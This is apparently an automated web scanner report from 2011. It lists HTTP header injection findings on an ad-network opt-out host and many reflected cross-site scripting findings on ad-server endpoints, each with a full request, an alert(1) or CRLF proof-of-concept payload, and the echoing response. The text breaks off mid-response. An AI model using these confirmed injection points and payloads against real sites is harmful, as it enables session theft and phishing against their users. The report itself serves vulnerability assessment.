GET /optout?d=71d66%0d%0a93e8c521907 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:24 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:31 GMT
Location: http://optout.crwdcntrl.net/optout?d=71d66
93e8c521907&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload aca9c%0d%0aae1dd9efdab was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c%0d%0aae1dd9efdab=1 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:40 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c
ae1dd9efdab=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

4. Cross-site scripting (reflected)  previous  next
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa62'-alert(1)-'8c692c22431 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:36 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:36 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0581'-alert(1)-'e88ada4a155 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:37 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:37 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.3. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ae5'-alert(1)-'40561ccbb3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 466
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:34 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f443e'-alert(1)-'c92a6f31e27 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 463
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:20 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9830'-alert(1)-'06f66f21338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1f33'-alert(1)-'01a9ecf3769 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a9e3'-alert(1)-'d66700f8150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:01 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e932'-alert(1)-'30f90c72958 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?1e932'-alert(1)-'30f90c72958 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:47:59 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da516cc31cbb50b4a; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:47:59 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?1e932'-alert(1)-'30f90c72958;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35275'-alert(1)-'d0849d7af27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:29 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:29 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cec5'-alert(1)-'2bc5f5d3ce8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:30 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:30 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.11. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f507c'-alert(1)-'0cce3655674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
